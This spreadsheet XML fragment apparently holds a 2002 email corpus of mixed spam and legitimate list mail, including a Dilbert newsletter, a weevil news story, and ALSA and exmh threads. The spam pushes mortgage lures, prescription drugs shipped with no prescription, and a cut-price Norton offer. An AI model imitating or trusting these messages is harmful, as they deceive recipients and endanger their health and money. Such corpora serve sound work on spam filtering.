 f" WIDTH=3D"14" HEIGHT=3D"11" ALT=3D"" BORDER=3D"0"&gt;Month of Dilbert&lt;/A&gt;&amp;nb=
 sp;&amp;nbsp;&lt;/FONT&gt;&lt;BR&gt;&lt;/TD&gt;&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
                 &lt;TD ALIGN=3D"LEFT" BGCOLOR=3D"#FFFFFF" COLSPAN=3D"10"&gt;&lt;A ta=
 rget=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3Dbc-zkZJ=
 Q6B0h4I6ycwmoKFbcoODOsRR"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/=
 archive/images/dilbert2002261210711.gif" BORDER=3D"0" ALT=3D"You need to go=
  online to see today's strip and other cool features on the Daily Dilbert."=
 &gt;&lt;/A&gt;&lt;BR&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.=
 gif" WIDTH=3D"600" HEIGHT=3D"8" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09&lt;/TABLE&gt;
 =09=09=09&lt;!-- ONLINE STORE AND STRIP TABLE END --&gt;
 =09=09=09
 =09=09=09&lt;!-- FOOTER TABLE BEGIN --&gt;
 =09=09=09&lt;TABLE WIDTH=3D"610" CELLPADDING=3D"0" CELLSPACING=3D"0" BORDER=3D=
 "0"&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"610" HEIGHT=3D"1" BGCOLOR=3D"#003366" COLSPAN=
 =3D"8"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"610" HEIGHT=3D"1" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"1" BGCOLOR=3D"#003366"&gt;&lt;IMG SRC=3D"http://www.c=
 omics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"1" HEIGHT=3D"4" BOR=
 DER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"10" BGCOLOR=3D"#FFFFFF"&gt;&lt;IMG SRC=3D"http://www.=
 comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"10" HEIGHT=3D"4" B=
 ORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"478" BGCOLOR=3D"#FFFFFF"&gt;&lt;IMG SRC=3D"http://www=
 .comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"478" HEIGHT=3D"4"=
  BORDER=3D"0" ALT=3D""&gt;&lt;BR&gt;&lt;FONT FACE=3D"helvetica, arial" SIZE=3D"1"&gt;&lt;A ta=
 rget=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3Dd1-ulDz=
 QpEXnw-g6s710pkan6vDy9RR"&gt;Unsubscribe&lt;/A&gt; | &lt;A target=3D"_blank" HREF=3D"ht=
 tp://ummail4.unitedmedia.com:80/Click?q=3De6-qG-rQwyYVb8zdlcXGFggi3XN99RR"&gt;=
 Modify Your Subscription&lt;/A&gt; | &lt;A target=3D"_blank" HREF=3D"http://ummail4.=
 unitedmedia.com:80/Click?q=3Dfb-aWBrQkgY8KMBcAXoF2kCFG_xfRRR"&gt;Request a New=
  Subscription&lt;/A&gt; | &lt;a href=3D"mailto:dilberthelp@unitedmedia.com"&gt;Report S=
 ubscription Problems&lt;/A&gt;&lt;BR&gt;
 &lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3D10=
 -YU4qI9Nynxl1H5DPf_AcLBGsqdRR"&gt;Subscribe to the Dilbert Newsletter/Join Dog=
 bert's New Ruling Class&lt;/A&gt; |&lt;BR&gt;
 &lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3D25=
 -inupIbdrN1g4vA2ZT9cXq2uR8dRR"&gt;Dilbert on Your Site/Intranet&lt;/A&gt; | &lt;A targe=
 t=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3D3b-XhmVINd=
 mJzGpEocFPZZh8xiKc9RR"&gt;Advertising Info&lt;/A&gt; | &lt;A target=3D"_blank" HREF=3D"=
 http://ummail4.unitedmedia.com:80/Click?q=3D50-M_6BIR0rsFWQArVAS5nxjtaOIRRR=
 "&gt;Dilbert in Your Publication&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"45" BGCOLOR=3D"#FFFFFF"&gt;&lt;IMG SRC=3D"http://www.=
 comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"45" HEIGHT=3D"4" B=
 ORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"62" BGCOLOR=3D"#FFFFFF"&gt;&lt;IMG SRC=3D"http://www.=
 comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"62" HEIGHT=3D"4" B=
 ORDER=3D"0" ALT=3D""&gt;&lt;BR&gt;&lt;A target=3D"_blank" HREF=3D"http://ummail4.united=
 media.com:80/Click?q=3D65-K83zIDP4M7i7Rb6D76VxeVxqLdRR"&gt;&lt;IMG SRC=3D"http://=
 www.comics.com/comics/dilbert/daily_dilbert/images/comics_com_logo.gif" WID=
 TH=3D"62" HEIGHT=3D"42" BORDER=3D"0" ALT=3D"Comics.com"&gt;&lt;/A&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"10" BGCOLOR=3D"#FFFFFF"&gt;&lt;IMG SRC=3D"http://www.=
 comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"10" HEIGHT=3D"4" B=
 ORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"4" BACKGROUND=3D"http://www.comics.com/comics/d=
 ilbert/daily_dilbert/images/white_line_right.gif"&gt;&lt;IMG SRC=3D"http://www.co=
 mics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"4" HEIGHT=3D"4" BORD=
 ER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"610" COLSPAN=3D"8"&gt;&lt;IMG SRC=3D"http://www.comic=
 s.com/comics/dilbert/daily_dilbert/images/daily_dilbert_footer.gif" WIDTH=
 =3D"610" HEIGHT=3D"11" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09&lt;/TABLE&gt;
 =09=09=09&lt;!-- FOOTER TABLE END --&gt;
 =09=09=09
 =09=09&lt;/TD&gt;
 =09=09&lt;TD&gt;
 =09=09
 =09=09=09
 =09=09
 =09=09=09&lt;!-- SKYSCRAPER TABLE BEGIN --&gt;
 =09=09=09&lt;table border=3D"0" cellspacing=3D"0" cellpadding=3D"0" height=3D"=
 600"&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09=09&lt;TD&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/=
 small_ad.gif" WIDTH=3D"20" HEIGHT=3D"11" BORDER=3D"0" ALT=3D"Advertisement"=
 &gt;&lt;BR&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif"=
  WIDTH=3D"2" HEIGHT=3D"2" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09=09&lt;TD&gt;&lt;a href=3D"http://www.partner2profit.com/redir.cfm?ccode=
 =3D1D74C2EA&amp;pcode=3DEF39755C" target=3D"_blank"&gt;&lt;img src=3D"http://www.flow=
 go.com/images/bt/p2p.gif?ccode=3D1D74C2EA&amp;pcode=3DEF39755C" width=3D120 hei=
 ght=3D600 border=3D0&gt;&lt;/a&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09&lt;/table&gt;
 =09=09=09&lt;!-- SKYSCRAPER TABLE END --&gt;
 =09=09=09
 =09=09=09
 =09=09=09
 =09=09&lt;/TD&gt;
 =09&lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;!-- CONTENT AND SKYSCRAPER AD TABLE END --&gt;
 &lt;script language=3D"JavaScript"&gt;
 &lt;!--
 document.writeln ('&lt;layer SRC=3D"http://ad.doubleclick.net/adl/dilbert.emai=
 l.com/email/;sz=3D468x60;ord=3D' + same + '?" visibility=3D"hidden" width=
 =3D468 height=3D60 onload=3D"moveToAbsolute(ph1.pageX,ph1.pageY);clip.width=
 =3D468;clip.height=3D60;visibility=3D\'show\';"&gt;&lt;/layer&gt;');
 //--&gt;
 &lt;/script&gt;
 &lt;/TD&gt;
 &lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
 &lt;IMG HEIGHT=3D1 WIDTH=3D1 SRC=3D"http://ummail4.unitedmedia.com:80/Click?q=
 =3D7a-EEaAnlBNprvH1kLgZ0PhfzAZ"&gt;
 --8227487.1026384200908.JavaMail.root.umsan1--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: MORTGAGE INFORMATION FOR YOU!........
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;FONT  SIZE=2 PTSIZE=10 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt;HAS YOUR MORTGAGE SEARCH GOT YOU DOWN?&lt;BR&gt;
 &lt;BR&gt;
 Win a $30,000 mortgage just for trying to get your mortgage rates down, and a little cash in your pocket!!&lt;BR&gt;
 know who is telling you the truth! We can solve all your problems.&lt;BR&gt;
 &lt;BR&gt;
 Visit our site today and in two minutes you can have us searching thousands of &lt;BR&gt;
 programs and lenders for you. Get the truth, get the facts, get your options &lt;BR&gt;
 all in one shot. It's absolutely FREE, and you can be done in only two minutes, &lt;BR&gt;
 so &lt;A HREF="http://www.zonehosts.net/yourlocallenders/index.html"&gt;Click Right NOW&lt;/A&gt; and put your worries behind you!&lt;BR&gt;
 &lt;BR&gt;
 &lt;/FONT&gt;&lt;/HTML&gt;
  [PO1:KJ)_8J7BJK9^":}]
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: fast ship Viagra, Phentermine, etc...              WK
</t>
  </si>
  <si>
    <t xml:space="preserve">We ship worldwide within 24 hours!
 No waiting rooms, drug stores, or embarrassing conversations. 
 Our licensed pharmacists will have your order to you in 1 or 2 days!
 Click this link to get started today!   
 http://www.atlanticmeds.com/main2.php?rx=17692
 VIAGRA and many other prescription drugs available, including: 
 XENICAL and Phentermine, weight loss medications used to help
 overweight people lose weight and keep this weight off. 
 VALTREX, Treatement for Herpes. 
 PROPECIA, the first pill that effectively treats
 male pattern hair loss. 
 http://www.atlanticmeds.com/main2.php?rx=17692
 ZYBAN, Zyban is the first nicotine-free pill that,
 as part of a  comprehensive program from 
 your health care  professional, can help you
 stop smoking. 
 http://www.atlanticmeds.com/main2.php?rx=17692
 CLARITIN, provides effective relief from the  symptoms 
 of seasonal allergies.  And Much More... 
 Cilck this link to get started today!
 http://www.atlanticmeds.com/main2.php?rx=17692
 To Be extracted from future contacts visit:
 http://worldrxco.com/remove.php
 internz
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [zzzzteana] And deliver us from weevil
</t>
  </si>
  <si>
    <t xml:space="preserve">http://www.guardian.co.uk/climatechange/story/0,12374,806695,00.html
 Weevil pest warms to life in south-west London
 James Meek, science correspondent
 Tuesday October 8, 2002
 The Guardian
 They're chomping in Chelsea, Fulham and Pimlico, but despite their fancy
 taste in London addresses they are neither posh nor particularly fussy: they
 are vine weevils and they want to eat your plants.
 Two species of vine weevil previously unable to survive Britain's cold
 winters have been discovered in south-west London, and one has also been
 detected in Surrey, Cardiff and Edinburgh.
 "This is probably the most serious new garden pest in recent memory," said
 Max Barclay, the curator of beetles at the Natural History Museum in London
 who discovered the creatures in the UK.
 The black vine weevil has long been native to Britain, causing enormous
 damage to glossy leaved plants such as laurels. But the two new species,
 otiorhynchus armadillo and otiorhynchus salicicola, not previously known
 north of Switzerland, are now prevalent in south London. "It's very likely
 these weevils have been introduced to Britain through imported ornamental
 plants from Italy," said Dr Barclay. "It looks like they're here to stay."
 He found otiorhynchus armadillo on the window of a Chelsea department store
 in 1998, but as the shop sold imported house plants, he assumed it was a
 migrant. It has now quietly become the most common species of vine weevil in
 south-west London. The second invader is not so numerous, but has
 established itself firmly in the same area.
 Apart from laurels, vine weevils attack bay, viburnum, ornamental ivy, and
 grape vines. An early sign of trouble is that notches appear in leaves. The
 soil-dwelling larvae bite the roots off below the surface.
 One possible explanation for the invaders' successful colonisation of
 Britain is global warming. Earlier springs and milder winters are already a
 fact.
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 Sell a Home with Ease!
 http://us.click.yahoo.com/SrPZMC/kTmEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Kime Oy Vereceksiniz ?
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sat, 2002-08-31 at 08:28, Ben Liblit wrote:
 &gt; Well, I've figured out the problem.  I guess you could say it's an ALSA 
 &gt; bug.  When one configures using "--with-cards=all", ALSA blindly turns 
 &gt; on the various CONFIG_SND_USB_* macros even if CONFIG_USB is not 
 &gt; actually set.
 [...]
 &gt; Matthias, would you please consider hooking up this patch in your 
 &gt; alsa-driver.spec?  It can be added in the obvious manner:
 &gt; 
 &gt; I suppose I should send this along to the ALSA developers as well.  For 
 &gt; them I'll produce a "proper" patch that makes the fix in "acinclude.m4". 
 &gt;   Or is someone else on this list already part of the ALSA developer 
 &gt; community, and willing to shepherd this through for me?
 Not me, but IMHO it's kind of offtopic to put it in freshrpms.net RPMs. 
 Upstream is the way to go...
 -- 
 \/ille Skytt
 ville.skytta at iki.fi
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Are Your Mortgage Rates The Best They Can Be........ 0922LkVT8-113rFxd3342c-21
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Homeowner, 
 Interest Rates are at their lowest point in 40 years! We help you find the 
 best rate for your situation by matching your needs with hundreds of 
 lenders!
 Home Improvement, Refinance, Second Mortgage, 
 Home Equity Loans, and much, much more!
 You're eligible even with less than perfect credit!
 This service is 100% FREE to home owners and new home buyers 
 without any obligation. 
 Where others say NO, we say YES!!!
 http://www243.wiildaccess.com
 Take just 2 minutes to complete the following form.
 There is no obligation, all information is kept strictly
 confidential, and you must be at least 18 years of age.  
 Service is available within the United States only.
 This service is fast and free. 
 http://www243.wiildaccess.com
 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 To opt out:
 http://www243.wiildaccess.com/optout.html
 8960ryoE6-752DjSn8958wQDd4-522UPqi8940xzrR4-094LKl46
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Mice born from rat-matured eggs
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-6,8341698,1440/
 Date: Not supplied
 Using one species to develop the eggs of another could in future help 
 endangered species and even women
</t>
  </si>
  <si>
    <t xml:space="preserve">--==_Exmh_-1590407866P
 Content-Type: text/plain; charset=us-ascii
 &gt; From:  Scott Lipcon &lt;slipcon@mercea.net&gt;
 &gt; Date:  Mon, 23 Sep 2002 17:49:47 -0400
 &gt;
 &gt; Chris, 
 &gt; 
 &gt; I'm home now, and this copy of exmh is pretty bad -  I'm running from
 &gt; CVS on Sunday night - the only change since then was the one you made
 &gt; this morning for "bulletproofing in MhReadSeqs".
 &gt; 
 &gt; I run exmh, and I can visably see it count up the number of unseen
 &gt; messages as it looks through the folders - I have about 3000 unseen
 &gt; messages in maybe 10 or 12 folders.    It takes a few seconds for all
 &gt; of the folders in the fcache to turn blue.  
 This is true...it's now looking at more than just unseen, so it takes a little 
 while (in the background) to build the sequences window.  There is probably 
 some tuning possible in this area.
 &gt; In +inbox, I have 4 unread messages.  They aren't blue, they are
 &gt; white background with a normal colored font.
 I changed the default display of unseen messages from a foreground of blue to 
 a background of white to make it possible to see what other sequences unseen 
 messages may be in.  I *did* ask Brent before I did it.  If you like the old 
 behavior, the old lines are still in app-defaults-color, but commented out.
 &gt; If I click on a message, I get the following traceback:
 &gt; 
 &gt; invalid command name "Mh_MarkSeen"
 &gt;     while executing
 &gt; "Mh_MarkSeen $exmh(folder) $msgid"
 &gt;     (procedure "Hook_MsgShow_update_unseen" line 5)
 &gt;     invoked from within
 &gt; "$cmd $mhProfile(path)/$exmh(folder)/$msgid mimeHdr"
 &gt;     (procedure "MsgShow" line 23)
 &gt;     invoked from within
 &gt; "MsgShow $msgid"
 &gt;     (procedure "MsgChange" line 18)
 &gt;     invoked from within
 &gt; "MsgChange 66 show"
 &gt;     invoked from within
 &gt; "time [list MsgChange $msgid $show"
 &gt;     (procedure "Msg_Change" line 3)
 &gt;     invoked from within
 &gt; "Msg_Change $msgNum $show"
 &gt;     (procedure "Msg_Pick" line 8)
 &gt;     invoked from within
 &gt; "Msg_Pick $lineno show"
 &gt;     (procedure "FtocRangeEnd" line 12)
 &gt;     invoked from within
 &gt; "FtocRangeEnd [lindex [split [.ftoc.t index current] .] 0] 0"
 &gt;     (command bound to event)
 This is because of your Hook_MsgShow_update_unseen which is calling a function 
 which no longer exists.
 I suspect you need
 	Seq_Del $exmh(folder) unseen $msgid
 now instead of 
 	Mh_MarkSeen $exmh(folder) $msgid
 &gt; It appears that the message does get marked as seen though, as it
 &gt; loses the white background, and nmh reports the same.  
 &gt; 
 &gt; If I click the flist button, it zero's the unseen count, and then
 &gt; there is again a visible delay as it counts up all the unseen 
 &gt; messages - maybe 3-4 seconds.
 &gt; 
 &gt; I really think my installation is OK now, but if this behavior is just
 &gt; really strange I'll blow everything away and reinstall.  I'm happy to
 &gt; spend some time helping to track this down, I don't really need exmh.
 &gt; I'm comfortable enough using nmh.
 &gt; 
 &gt; Scott
 &gt; 
 &gt; 
 &gt; 
 &gt; _______________________________________________
 &gt; Exmh-workers mailing list
 &gt; Exmh-workers@redhat.com
 &gt; https://listman.redhat.com/mailman/listinfo/exmh-workers
 -- 
 Chris Garrigues                 http://www.DeepEddy.Com/~cwg/
 virCIO                          http://www.virCIO.Com
 716 Congress, Suite 200
 Austin, TX  78701		+1 512 374 0500
   World War III:  The Wrong-Doers Vs. the Evil-Doers.
 --==_Exmh_-1590407866P
 Content-Type: application/pgp-signature
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: Exmh version 2.2_20000822 06/23/2000
 iD8DBQE9j5OPK9b4h5R0IUIRAqAyAJ4t1/YU6tI+81tfv8PS65DO9DiXdACfYxBP
 V0bKP6O4yRQjD38MQMxeWcM=
 =85Yk
 -----END PGP SIGNATURE-----
 --==_Exmh_-1590407866P--
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [scoop] CEVIRI YAZILIMLARI
</t>
  </si>
  <si>
    <t xml:space="preserve">HTML&gt;
 &lt;HEAD&gt;
 &lt;TITLE&gt;&lt;/TITLE&gt;
 &lt;/HEAD&gt;
 &lt;BODY bgcolor=white&gt;
 &lt;table&gt;
 &lt;tr&gt;
    &lt;td&gt;
    &lt;center&gt;&lt;br&gt;
    &lt;b&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;     &lt;/center&gt;&lt;/B&gt;
    &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;P align=center&gt;&lt;FONT  color=white size =7 &gt;&lt;STRONG&gt;
 &lt;TABLE cellSpacing=1 cellPadding=1 width="501" border=5 style="WIDTH: 501px; HEIGHT: 907px"&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD&gt;&lt;IMG alt="" 
       src="http://www.bilsag.com/web1.jpg"&gt;&lt;/TD&gt;
     &lt;TD bgcolor=red&gt;&lt;FONT size=4
       color=white&gt;&lt;EM&gt;&lt;STRONG&gt;NTERNETTE KENDNZ DAHA Y HSSEDECEKSNZ.
 	  NGLZCE WEB SAYFALARININ TRKE'YE EVR YAZILIMI
 	   &lt;/STRONG&gt;&lt;/EM&gt; &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
   &lt;TD bgcolor=palegoldenrod&gt;&lt;FONT size=7 
       color=darkblue&gt;&lt;EM&gt;&lt;STRONG&gt;$ 39+KDV&lt;/STRONG&gt;&lt;/EM&gt; &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD  &gt;&lt;IMG alt="" 
       src="http://www.bilsag.com/cev1.jpg"&gt;&lt;/TD&gt;
     &lt;TD bgcolor=red&gt;&lt;FONT size=4
       color=white&gt;&lt;STRONG&gt;&lt;EM&gt; NGLZCE'DEN TRKE'YE BLGSAYAR DESTEKL
 	    METN EVR YAZILIMI  
 	 (MS-WORD ALTINDA KULLANIM, TM WINDOWS VERSYONLARI LE UYUMLU)
 	  &lt;/EM&gt;&lt;/STRONG&gt; &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
   &lt;TD bgcolor=palegoldenrod&gt;&lt;FONT size=7 
       color=darkblue&gt;&lt;STRONG&gt;&lt;EM&gt;$ 69+KDV&lt;/EM&gt;&lt;/STRONG&gt; &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD bgcolor=darkblue&gt;&lt;FONT size=6 color=white&gt;&lt;STRONG&gt;&lt;EM&gt;K YAZILIM &amp;nbsp; BRLKTE&lt;/FONT&gt;&lt;/EM&gt;    &lt;/STRONG&gt;&lt;/TD&gt;
     &lt;TD bgcolor=darkblue&gt;&lt;FONT size=7 
       color=white&gt;&lt;STRONG&gt;&lt;EM&gt;$ 
   89+KDV&lt;/EM&gt;&lt;/STRONG&gt; 
 &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/P&gt;
       &lt;P align=center&gt;&lt;STRONG&gt;&lt;a href="http://www.bilsag.com/index.html"&gt;&lt;FONT color=darkcyan size=2&gt;Ayrntl Bilgi 
       in&amp;nbsp; &lt;/FONT&gt;&lt;/STRONG&gt;&lt;STRONG&gt;&lt;FONT 
       color=darkcyan size=2&gt;  tklayn&lt;/FONT&gt;&lt;/A&gt;&lt;/STRONG&gt; 
       &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/P&gt;
       &lt;P align=center&gt;
       &amp;nbsp;&lt;A href="http://www.bilsag.com/siparis.htm"&gt;&lt;IMG alt="" src="http://www.bilsag.com/sipbuton.gif" border=0
       &gt;&lt;/A&gt; &lt;/P&gt;
       &lt;P align=center&gt;&lt;FONT color=#ff0000&gt;&lt;STRONG&gt;BLSAG Ltd.&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/P&gt;
       &lt;P align=center&gt;&lt;FONT size=2&gt;&lt;FONT color=#ff0000&gt;&lt;STRONG&gt;AHMET MTHAT 
       EFEND SOK. 22/1 ANKAYA 06700 / ANKARA /&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/P&gt;
       &lt;P align=center&gt;&lt;FONT size=2&gt;&lt;FONT color=#ff0000&gt;&lt;STRONG&gt;&lt;FONT 
       size=+0&gt;Tlf: 0312. 439 2850/ Fax: 0312. 439 9347&lt;/FONT&gt; 
       &lt;/STRONG&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/P&gt;
       &lt;P align=center&gt;&lt;A href="mailto:bilsag@msn.com"&gt;&lt;FONT color=#ff0000 
       size=3&gt;&lt;STRONG&gt;bilsag@msn.com&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/A&gt;&lt;/P&gt;
     &lt;TD&gt;
       &lt;P align=center&gt;&amp;nbsp;&lt;/P&gt;
       &lt;P align=center&gt;&amp;nbsp;&lt;/P&gt;
       &lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;
 &lt;P&gt;&lt;/P&gt;
 &lt;form action="http://www.bilsag.com/iptal1.asp" method="post"&gt;
 &lt;center&gt;
 &lt;TABLE WIDTH="540" CELLSPACING=1 CELLPADDING=1 BORDER=0 bgcolor="#dddddd"&gt;
 &lt;TR&gt;
 &lt;TD BGCOLOR="#eeeeee" align="middle"&gt;&lt;FONT FACE="Verdana, Arial" SIZE="-1" COLOR="#000000"&gt;
 &lt;strong&gt;E-posta adres listemizden&lt;/strong&gt; kmak iin&lt;strong&gt;IKAR&lt;/strong&gt; tuuna basnz
 &lt;/FONT&gt;
 &lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD BGCOLOR="#eeeeee" align="middle"&gt;
 &lt;INPUT NAME="e" VALUE="sitescooper-talk@lists.sourceforge.net" SIZE=25 
      &gt;&lt;/FONT&gt;                   
 &lt;INPUT TYPE="submit" VALUE="kar"&gt;
 &lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD BGCOLOR="#ffffff" align=right&gt;
 &lt;FONT FACE="arial" SIZE="1" COLOR="#000000"&gt;Bu elektronik posta: sitescooper-talk@lists.sourceforge.net e gnderilmitir&lt;/FONT&gt;
 &lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;
 &lt;/center&gt;
 &lt;/form&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
 -------------------------------------------------------
 This sf.net email is sponsored by: OSDN - Tired of that same old
 cell phone?  Get a new here for FREE!
 https://www.inphonic.com/r.asp?r=sourceforge1&amp;refcode1=vs3390
 _______________________________________________
 Sitescooper-talk mailing list
 Sitescooper-talk@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/sitescooper-talk
</t>
  </si>
  <si>
    <t xml:space="preserve">On Saturday, September 28, 2002, at 12:54 PM, Gary Lawrence Murphy 
 wrote:
 &gt; Although it's like a total shock to 99.999% (5nines) of all the
 &gt; employed website designers out there, the truth is webforms /can/
 &gt; accept "U.S. of A" as a country.  Incredible, but true.  Web forms can
 &gt; also accept /multiple/ or even /free-form/ telephone numbers and can
 &gt; even be partitioned into manageable steps. All this can also be done
 &gt; without selling exclusive rights to your wallet to the World's
 &gt; Second-Richest Corporation (assuming Cisco is still #1) and vendor
 &gt; locking your business into their "small transaction fee" tithe.
 Yes, but this is what normally happened:
 Engineer: we can put an input validator/parser on the backend to do 
 that.
 Designer: there's a JavaScript library that can do some of the 
 pre-validation.
 Creative Director: I want it in blue, with a zooming logo.
 Engineer: can we get to that later, we need to meet functional specs.
 Creative Director: You *don't* understand. *I* want it in blue.
 Creative Director: Oh, and the site launches this Friday because I sent 
 out a press release about our new strategic partnership with HypeCorp.
 Designer: fine, we'll just put a list of countries in a drop down.
 Engineer: and we can validate against that list.
 Creative Director: I don't give a shit. As long as it's in blue. And 
 has a link to my press release.
 ----
 Bill Humphries &lt;bill@whump.com&gt;
 http://www.whump.com/moreLikeThis/
</t>
  </si>
  <si>
    <t xml:space="preserve">Tom wrote:
 &gt;On Wed, 18 Sep 2002, R. A. Hettinga wrote:
 &gt;--]I know it's not the popular choice for a lot of people, but I'd
 &gt;--]suggest, um, church. :-). Like Woody Allen said, 90% of life is
 &gt;--]showing up, right?
 &gt;--]
 &gt;
 &gt;I think another venue for finding people is the workplace. As a contractor
 &gt;I have had the opertunity to meet lots of eligables over the course of my
 &gt;wandering workhistory.
 &gt;
 &gt;My wife was my Task Order Manager years ago, thats  how we met. Her joke
 &gt;is that she is still my Task Order Manager but now I dont get paid:)-
 &gt;  
 &gt;
 Sure if you're willing to risk firing, lawsuits, etc. The last full time 
 job I had the sexual harassement seminar
 was pretty clear - yes you can have relationships at the office, but its 
 extremely difficult, and the pitfalls are
 horrendous.
 Owen
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Fw: NORTON SYSTEMWORKS CLEARANCE SALE_ONLY $29.99!                    1104
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv=3D"Content-Language" content=3D"en-us"&gt;
 &lt;meta name=3D"GENERATOR" content=3D"Microsoft FrontPage 4.0"&gt;
 &lt;meta name=3D"ProgId" content=3D"FrontPage.Editor.Document"&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Dwindows-=
 1252"&gt;
 &lt;title&gt;Norton AD&lt;/title&gt;
 &lt;/head&gt;
